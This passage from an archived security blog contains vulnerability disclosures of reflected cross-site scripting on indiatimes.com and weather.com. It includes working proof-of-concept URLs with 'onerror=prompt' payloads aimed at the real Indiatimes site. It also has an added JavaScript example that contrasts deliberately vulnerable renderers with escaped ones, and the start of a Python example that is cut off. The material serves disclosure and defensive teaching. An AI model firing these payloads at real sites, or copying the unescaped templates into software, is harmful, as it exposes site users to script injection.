<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><span data-mce-style="color: #000000;"><a data-mce-href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121" data-mce-style="color: #000000;" href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121" style="color: black;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1121</a></span></span></span></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-65959463165616939802015-06-20T02:13:00.001-07:002015-06-20T02:13:45.056-07:00All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (Cross Site Scripting) Attacks <div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b style="background-color: white;"><br /></b><b style="background-color: white;">All Links in </b><b style="background-color: white;">Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (Cross Site Scripting) Attacks </b></span></span></div>
<div class="clearfix entry-content">
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b><b>(1) Domain Description:</b></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">http://www.indiatimes.com</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">"The Times of India (TOI) is an Indian English-language daily newspaper. It is the third-largest newspaper in India by circulation and largest selling English-language daily in the world according to Audit Bureau of Circulations (India). According to the Indian Readership Survey (IRS) 2012, the Times of India is the most widely read English newspaper in India with a readership of 7.643 million. This ranks the Times of India as the top English daily in India by readership. </span><span style="font-size: small;">It is owned and published by Bennett, Coleman & Co. Ltd. which is owned by the Sahu Jain family. In the Brand Trust Report 2012, Times of India was ranked 88th among India's most trusted brands and subsequently, according to the Brand Trust Report 2013, Times of India was ranked 100th among India's most trusted brands. In 2014 however, Times of India was ranked 174th among India's most trusted brands according to the Brand Trust Report 2014, a study conducted by Trust Research Advisory." (</span><span style="font-size: small;"><a href="http://en.wikipedia.org/" target="_blank">en.Wikipedia.org</a>)</span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>(2) Vulnerability description:</b></span></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The indiatimes.com web application is vulnerable to reflected cross-site scripting (XSS), which an attacker can exploit.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b><br /></b></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The flaw lies in how Indiatimes handles its URL paths: only part of the path is filtered. All URLs under the "photogallery" and "top-lists" topics are affected.</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Indiatimes builds page content from part of the request path under the "photogallery" and "top-lists" topics without validating or encoding that path at all. This mistake is common on today's websites, because the developers are usually not security specialists.</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerability can be exploited without a user login. Tests were performed on Mozilla Firefox (26.0) on Ubuntu (12.04) and Microsoft IE (9.0.15) on Windows 7.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSwkr3z-wy06CFdOoSZTJT86yUUVtYKt3-U6h_ZkgWm1uotMaqCkkVnemeihlB4wJ8XFE-eTmF6mG1jfDBhO2WylN_PAQk4gP_nBqnCXAsg58_bAmmoajtAgo3LM16w3L1zOBlbmtnx1w/s1600/indiatimes_xss1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSwkr3z-wy06CFdOoSZTJT86yUUVtYKt3-U6h_ZkgWm1uotMaqCkkVnemeihlB4wJ8XFE-eTmF6mG1jfDBhO2WylN_PAQk4gP_nBqnCXAsg58_bAmmoajtAgo3LM16w3L1zOBlbmtnx1w/s1600/indiatimes_xss1.png" style="cursor: move;" width="400" /></a></span></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUm2pg5__HN25aUoUCsJ5II-AeXBOCSb1i7-Kcv4-chMFu3YcB5AVWlWkuukDcz-wOkmrSFSIowJe0nyRxmcPA89BFY7Aa1iU3SW8pGyrbtMXq0oLxVikF-iCMndORfzDRW4011tVDlh4/s1600/indiatimes_xss_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUm2pg5__HN25aUoUCsJ5II-AeXBOCSb1i7-Kcv4-chMFu3YcB5AVWlWkuukDcz-wOkmrSFSIowJe0nyRxmcPA89BFY7Aa1iU3SW8pGyrbtMXq0oLxVikF-iCMndORfzDRW4011tVDlh4/s1600/indiatimes_xss_2.png" style="cursor: move;" width="400" /></a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Codes:</b></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/photogallery/" target="_blank">http://www.indiatimes.com/photogallery/</a>">homeqingdao<img src=x onerror=prompt('justqdjing')></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/top-lists/" target="_blank">http://www.indiatimes.com/top-lists/</a>">singaporemanagementuniversity<img src=x onerror=prompt('justqdjing')></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/photogallery/lifestyle/" target="_blank">http://www.indiatimes.com/photogallery/lifestyle/</a>">astar<img src=x onerror=prompt('justqdjing')></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="http://www.indiatimes.com/top-lists/technology/" target="_blank">http://www.indiatimes.com/top-lists/technology/</a>">nationaluniversityofsingapore<img src=x onerror=prompt('justqdjing')></span></div>
</div>
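<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The following is an added example, not code from the advisories above and not Mozilla's or Indiatimes's own code. It models the two reflection contexts described in the Mozilla cross-reference analysis (a path segment percent-encoded into an href but echoed unescaped as link text) and in the Indiatimes POC codes (a request path written into a quoted attribute, where a leading "> closes the attribute and the tag) as plain string templates, then shows the context-specific encoding that closes each hole and a check that detects injected tags. The renderers are hypothetical reconstructions: the double percent-encoding is modelled as two encodeURIComponent calls to match the %253C seen in the advisory, and the Indiatimes attribute is assumed to be an href because the advisory does not name it. Only the payloads are taken from the posts.</span></div>
</div>

```javascript
// Added example, not code from the advisories or from Mozilla / Indiatimes.
// Two reflection contexts from the posts are modelled as string templates,
// each beside a hardened version, plus a check for injected tags.
// All renderers are hypothetical reconstructions; only the payloads are quoted.

// Payloads quoted from the advisories.
const PATH_PAYLOAD = '<body onload=prompt("justqdjing")>';
const ATTR_PAYLOAD = '">homeqingdao<img src=x onerror=prompt(\'justqdjing\')>';

// Escape for HTML text nodes and double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable breadcrumb link (models the lxr/mxr behaviour): the requested
// path segment is percent-encoded into href but echoed raw as the link text.
// The advisory shows the href as %253Cattacktest%253E, i.e. double-encoded;
// two encodeURIComponent calls reproduce that (an assumption about the server).
function renderBreadcrumbVulnerable(segment) {
  const href = '/mozilla-central/source/chrome/' +
    encodeURIComponent(encodeURIComponent(segment));
  return `<a href="${href}">${segment}</a>`;
}

// Hardened breadcrumb link: percent-encode once for the URL, then HTML-escape
// both the attribute value and the text node.
function renderBreadcrumbSafe(segment) {
  const href = '/mozilla-central/source/chrome/' + encodeURIComponent(segment);
  return `<a href="${escapeHtml(href)}">${escapeHtml(segment)}</a>`;
}

// Vulnerable topic link (models the Indiatimes pages): the request path is
// written into a quoted href unescaped, so a path beginning with '">' closes
// the attribute and the tag and the rest is parsed as markup. The advisory
// does not say which attribute is affected; an href is assumed here.
function renderTopicLinkVulnerable(path) {
  return `<a href="http://www.indiatimes.com/${path}">Current topic</a>`;
}

// Hardened topic link: encode the path as a URL (encodeURI keeps '/' but
// encodes '"', '<' and '>'), then escape it for the attribute context.
function renderTopicLinkSafe(path) {
  return `<a href="http://www.indiatimes.com/${escapeHtml(encodeURI(path))}">Current topic</a>`;
}

// Check: tag names in the rendered HTML that the template itself did not emit.
// A non-empty result means reflected input became live markup.
function injectedTags(html, allowed) {
  const found = [];
  for (const m of html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)) {
    const name = m[1].toLowerCase();
    if (!allowed.includes(name) && !found.includes(name)) found.push(name);
  }
  return found;
}

// Run both payloads through the vulnerable and hardened renderers.
function runChecks() {
  const topicPath = 'photogallery/' + ATTR_PAYLOAD;
  return {
    mozillaVulnerable: injectedTags(renderBreadcrumbVulnerable(PATH_PAYLOAD), ['a']),
    mozillaSafe: injectedTags(renderBreadcrumbSafe(PATH_PAYLOAD), ['a']),
    indiatimesVulnerable: injectedTags(renderTopicLinkVulnerable(topicPath), ['a']),
    indiatimesSafe: injectedTags(renderTopicLinkSafe(topicPath), ['a']),
  };
}
```

<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">runChecks() reports ["body"] and ["img"] for the two vulnerable renderers and an empty list for both hardened ones. The point of the pairing is that percent-encoding is URL encoding, not HTML encoding: it protects the href in the Mozilla case but does nothing for the text node next to it, and in the Indiatimes case the unescaped " is what lets the path leave the attribute. Each output context needs its own encoder.</span></div>
</div>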
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>POC Video:</b></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be">https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Blog Details:</b></span></span></div>
</div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://securityrelated.blogspot.sg/2014/11/two-topics-of-indiatimes-indiatimescom.html">http://securityrelated.blogspot.com/2014/11/two-topics-of-indiatimes-indiatimescom.html</a></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b>What is XSS?</b></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">"Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it." (OWASP)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /><br /><span style="font-size: small;"><b>(3) Vulnerability Disclosure:</b></span></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">The vulnerabilities were reported to Indiatimes in early September 2014. However, they are still unpatched.</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><br /><br /><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Discovered and Reported by:</span></div>
</div>
<div style="background-color: white;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;">Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558910457235251201">@justqdjing</a>)</span></div>
</div>
<div style="background-color: white;">
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/wangjing/" target="_blank">http://www.tetraph.com/wangjing/</a></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Related Articles:</b></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://seclists.org/fulldisclosure/2014/Nov/91">http://seclists.org/fulldisclosure/2014/Nov/91</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://lists.openwall.net/full-disclosure/2014/11/27/6">http://lists.openwall.net/full-disclosure/2014/11/27/6</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1256">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1256</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://progressive-comp.com/?l=full-disclosure&m=141705615327961&w=1">https://progressive-comp.com/?l=full-disclosure&m=141705615327961&w=1</a></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://tetraph.blog.163.com/blog/static/234603051201501352218524/">http://tetraph.blog.163.com/blog/static/234603051201501352218524/</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.techworm.net/2014/12/times-india-website-vulnerable-cross-site-scripting-xss-attacks.html">http://www.techworm.net/2014/12/times-india-website-vulnerable-xss</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://cxsecurity.com/issue/WLB-2014120004">https://cxsecurity.com/issue/WLB-2014120004</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://vulnerabilitypost.wordpress.com/2014/12/04/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">https://vulnerabilitypost.wordpress.com/2014/12/04/indiatimes-xss</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://diebiyi.com/articles/security/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">http://diebiyi.com/articles/security/all-links-in-two-topics-of-indiatimes</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.inzeed.com/kaleidoscope/computer-security/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">http://www.inzeed.com/kaleidoscope/computer-security/all-links-in-two-topics-of-indiatimes</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://itsecurity.lofter.com/post/1cfbf9e7_54fc6c9">http://itsecurity.lofter.com/post/1cfbf9e7_54fc6c9</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://computerobsess.blogspot.com/2014/12/all-links-in-two-topics-of-indiatimes.html">http://computerobsess.blogspot.com/2014/12/all-links-in-two-topics-of-indiatimes.html</a></span></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://whitehatview.tumblr.com/post/104310651681/times-of-india-website-vulnerable-to-cross-site-scr">http://whitehatview.tumblr.com/post/104310651681/times-of-india-website-vulnerable-to</a></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="http://www.tetraph.com/blog/computer-security/all-links-in-two-topics-of-indiatimes-indiatimes-com-are-vulnerable-to-xss-cross-site-scripting-attacks/">http://www.tetraph.com/blog/computer-security/all-links-in-two-topics-of-indiatimes</a></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br class="Apple-interchange-newline" /></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-64404621652124574682015-06-20T02:11:00.000-07:002015-06-20T02:11:16.705-07:00The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks</b></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Domain Description:</b></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">http://www.weather.com/</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">"The Weather Channel is an American basic cable and satellite television channel which broadcasts weather forecasts and weather-related news and analyses, along with documentaries and entertainment programming related to weather. Launched on May 2, 1982, the channel broadcasts weather forecasts and weather-related news and analysis, along with documentaries and entertainment programming related to weather."</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br />"As of February 2015, The Weather Channel was received by approximately 97.3 million American households that subscribe to a pay television service (83.6% of U.S. households with at least one television set), which gave it the highest national distribution of any U.S. cable channel. However, it was subsequently dropped by Verizon FiOS (losing its approximately 5.5 million subscribers), giving the title of most distributed network to HLN. Actual viewership of the channel averaged 210,000 during 2013 and has been declining for several years. Content from The Weather Channel is available for purchase from the NBCUniversal Archives." (Wikipedia)</span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><b>Vulnerability description:</b></span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /><br />The Weather Channel's website has a security problem: attackers can exploit it through XSS bugs.</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Almost all links under the weather.com domain are vulnerable to reflected XSS. An attacker only needs to append script to the end of a Weather Channel URL; when a victim opens that link, the script executes in the victim's browser in the context of weather.com.</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">Some ten thousand links were tested with a self-written tool. During the tests, 76.3% of the links belonging to weather.com were found to be vulnerable to XSS attacks.</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">The root cause is that weather.com builds HTML tags from the request URL without encoding it. A URL containing a double quote followed by a closing angle bracket therefore terminates the attribute and the tag, and whatever follows in the URL is parsed as new markup. No form field or parameter is needed: the path itself is the injection point.</span></span></div>
</div>
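<div style="margin: 0px;">
<span style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;">The Python below is an added example; it is neither the self-written scanning tool mentioned above nor weather.com's own code. It models the root cause with a hypothetical template that drops the request path into a canonical-link attribute (the post says only that URLs were placed into HTML tags unencoded; the exact tag is an assumption), puts the hardened template beside it, and applies the check a mass-URL scanner would use: append the post's payload to each link and see whether it comes back unencoded. The sample site table and the fake_fetch stand-in for HTTP are constructed so that the example runs offline.</span></span></div>

```python
"""Reflected XSS through the URL path: vulnerable vs hardened rendering,
plus the reflection check a URL scanner applies.

Added example, not code from weather.com or from the original post. The
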